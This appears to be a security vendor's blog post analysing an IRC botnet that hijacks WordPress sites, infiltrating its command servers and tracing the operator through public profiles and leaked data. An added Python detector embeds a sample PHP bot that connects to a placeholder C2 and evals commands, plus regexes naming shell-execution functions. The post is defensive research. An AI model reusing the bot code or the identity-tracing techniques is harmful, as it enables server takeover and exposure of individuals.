While analyzing some of the attacks we see on the Wordfence Web Application Firewall, we discovered code that an attacker was trying to upload that was part of a botnet. In case you’re not in the information security space, a botnet is a network of ‘bot’ or ‘zombie’ machines that is controlled from a central command and control or C&C server.
In the case of this botnet, it was controlled via a chat service called IRC or Internet Relay Chat. IRC is a popular way of controlling botnets because you can have all the ‘bot’ or zombie machines connect to the chat server and join a channel to receive broadcasts. This allows the botnet owner to simply sign into the chat server and broadcast commands to all the zombies which they run at the same time.
The code below shows a typical hack attempt where the attacker is trying to inject their botnet code into a targeted WordPress site. Wordfence blocks this attack and any attack that includes this botnet code.
Once a WordPress site is compromised with this attack, the infected server connects to an IRC chat server, ready to receive commands and do the botnet owner’s bidding.
The owner might use those zombie WordPress sites to attack more sites. Or he might use them to launch a distributed denial of service or DDoS attack on someone, overwhelming them with traffic. He could also simply deface all the sites in his botnet with SEO spam.
The hashed password is shown next to LND-Bloodman’s username above. We’ve blurred the encoded command and control server IP address. The content length is over 25K, so this is a reasonably long script.
The Wordfence team decided to analyze the botnet code and try to identify who was running the botnet.
Going After the Command and Control Servers
During our analysis of the malicious code, we found five IP addresses of IRC command and control servers (C&C servers) for this botnet. Two of them were down. Three were still up.
We created modified zombie code to connect to the C&C servers and do further analysis. Our code was designed to save all files it was commanded to download. It would also log all commands sent to it and not actually do anything malicious.
The botnet owner’s nickname/handle appears to be Bloodman.
One of the things we hoped to capture this way was the password Bloodman uses to control his botnet. He had built his botnet zombie code so that whenever he sent a command to the zombies via the C&C server, it included a password.
The zombies would hash that password and compare the hash to the one stored in the code; if it matched, they would accept the command as coming from Bloodman and run it.
The hash we found in the code, as you can see in the above image, is:
Googling this hash shows that the malware with this password has been seen before. A blogger saw an attack containing this hash in September last year.
The oldest Google result mentioning this hash is from December 2012 and is a request to crack the hash and recover the password, which is still unanswered. This indicates with a high degree of certainty that Bloodman has been active and using this password since December 2012.
Anyone who can reverse this hash can simply sign into any IRC server that Bloodman is using and have immediate control of his botnet.
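The two defensive handles the post relies on are the firewall blocking any upload that carries this bot code, and the hard-coded command-password hash being a stable indicator that can be searched for. The following added example (not Wordfence’s code or the botnet’s code) shows a small request-body scanner that does both; the regexes, the threshold, the `deadbeef…` hash and the sample request bodies are constructed for illustration.

```python
import re
from typing import List, Optional

# Constructed sample request bodies for this example (not the article's capture):
# a benign form post and an IRC-bot style PHP dropper with a placeholder C2 and hash.
BENIGN_POST = "title=Hello&content=Just+a+normal+blog+post"
BOT_DROPPER = (
    "<?php $server='C2_IP_PLACEHOLDER'; $port=6667;"
    "$sock=fsockopen($server,$port);"
    'fwrite($sock,"NICK [FreeBSD]|apache|4242\\r\\n");'
    'fwrite($sock,"JOIN #channel\\r\\n");'
    "if(md5($pass)=='deadbeefdeadbeefdeadbeefdeadbeef'){eval($cmd);}"
)

# Heuristic indicators of a PHP IRC bot. These patterns are assumptions written
# for this example, not Wordfence's actual firewall rules.
INDICATORS = {
    "irc_socket": re.compile(r"\bfsockopen\s*\(", re.I),
    "irc_protocol": re.compile(r"\b(NICK|JOIN\s+#|PRIVMSG|PONG)\b"),
    "hash_gate": re.compile(r"\bmd5\s*\([^)]*\)\s*==\s*['\"]([0-9a-f]{32})['\"]", re.I),
    "remote_exec": re.compile(r"\b(eval|system|shell_exec|passthru)\s*\(", re.I),
}


def matched_indicators(body: str) -> List[str]:
    """Return the names of the indicators that fire on a request body."""
    return [name for name, rx in INDICATORS.items() if rx.search(body)]


def should_block(body: str, threshold: int = 2) -> bool:
    """Block when at least `threshold` independent indicators fire.
    Requiring more than one keeps a lone fsockopen() in a legitimate plugin from being blocked."""
    return len(matched_indicators(body)) >= threshold


def extract_gate_hash(body: str) -> Optional[str]:
    """Pull the hard-coded command-password hash out of the payload.
    The same hash ships in every copy of the dropper, so it is a stable
    indicator to pivot on (the article searched for it and found reports back to 2012)."""
    m = INDICATORS["hash_gate"].search(body)
    return m.group(1) if m else None


if __name__ == "__main__":
    for label, body in (("benign", BENIGN_POST), ("dropper", BOT_DROPPER)):
        verdict = "BLOCK" if should_block(body) else "ALLOW"
        print(label, matched_indicators(body), extract_gate_hash(body), verdict)
```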
We connected to all three of his C&C servers and after watching and waiting for about 48 hours we hit the jackpot. He signed in and sent a command to the botnet. We captured his password. The first part of it is:
We’ve intentionally starred out the rest of the password (which is long) to prevent anyone else from taking control of these botnets.
This allowed us to take control of his botnet if we wanted to. It turns out Bloodman also refers to himself as 1x33x7.
At this point we connected to one of the botnet servers:
We’ve blurred out any IP addresses or identifying information. The server is named to look like some kind of FBI honeypot. Considering it’s actively hacking WordPress sites, we’re guessing it’s a joke on the hacker’s part.
Joining the channel #1x33x7 where all the bots hang out shows us the following when we ask for a list of users:
There are 31 infected machines shown excluding the three users. And there is also LND-Bloodman hanging out in the channel.
The format of the nicknames shows some information about the compromised system including what web server software it’s running.
Running IRC’s ‘whois’ command on a few of the zombies shows that some of them are FreeBSD unix boxes. Others are running Windows Server 2012 or Windows 8 – both identify as “Windows NT 6.2 Build 9200.”
Running ‘whois’ on the two Bloodman accounts gave us two IP addresses and a possible email address with a first name.
At this point we have enough information to go ‘active’ and take control of the botnet and shut it down. The botnet has enough functionality for us to first delete any infected code and then kill the processes running on remote machines, thereby destroying the part of the botnet that is connected to this command and control server.
We chose not to shut down the botnet for two reasons:
Firstly, the Computer Fraud and Abuse Act does not allow us to hack the hackers. So even though we had passively connected to this hacker’s command and control system, going active and changing the system could land us in some hot water with the FBI. We would rather observe and report because that is all the law allows unless you work for the military or a military agency in the United States.
Secondly, we were concerned that we may not have all the information and we may actually do harm by trying to disinfect remote machines.
We don’t think that shutting down a single C&C server or even all three C&C servers and their respective bots would do much good. Bloodman would simply regroup and reinfect new sites with new C&C servers.
Attribution – Who is doing this?
To try to determine who controls this botnet, we started with both usernames that appear in the source code: Bloodman and 1x33x7. One of those usernames pointed us to a Twitter account. The Twitter account contains a German slogan “I am root” and various images of what is probably the botnet owner’s face.
The Twitter account links to a YouNow profile which is a live video broadcasting service – it uses the same username.
The YouNow profile linked to a YouTube account that uses the second username, which contains plenty of identifying information and a video of the botnet controller bragging about his botnet. He speaks German, likes to play with fireworks and we know what car he drives and have images of various German roads.
In addition to the open source intelligence above, we mined public data leaks and found a user profile on a hacker website that includes one of the usernames and the IP address the user last signed in from. That IP address is in Germany and belongs to Deutsche Telekom. Providing this to the authorities would probably reveal his full identity from ISP logs.
This is a small botnet with under 100 infected machines when you combine all the C&C servers together. This individual is launching under 2000 attacks per week. While they are inconvenient and consume resources, they are all blocked by the Wordfence Firewall.
We are working with net block owners to let them know about machines, particularly C&C servers that are on their network and are likely compromised.
We think that discussing the tactics, techniques and procedures of attackers, both small and large, helps us all better understand what we are protecting our WordPress sites against and how to do a better job.